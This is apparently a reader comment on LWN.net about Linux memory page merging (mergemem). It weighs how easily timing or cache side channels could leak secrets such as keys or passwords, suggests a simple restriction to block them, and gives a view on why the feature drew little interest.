If one could only check whether full pages are merged, that would be
pretty hard to exploit (one would have to guess all of the page
correctly, i.e., usually the complete key or password).
Another potential attack path was using a timing attack based on how
long the merge attempt takes, or how much of the merge-attempted pages
is in the cache afterwards. That would bring the granularity down to
a word or a cache line, which makes guessing much more practical.
IMO, even that attack path could be blocked relatively easily (e.g.,
allow only merging corresponding pages from processes that run the
same binary, and were not tainted with ptrace or somesuch).
My impression was that too much emphasis was given to the
vulnerabilities in the mergemem announcements, and that may be one
reason why there was not much interest in it.
Copyright © 2017, Eklektix, Inc.
Comments and public postings are copyrighted by their creators.
Linux is a registered trademark of Linus Torvalds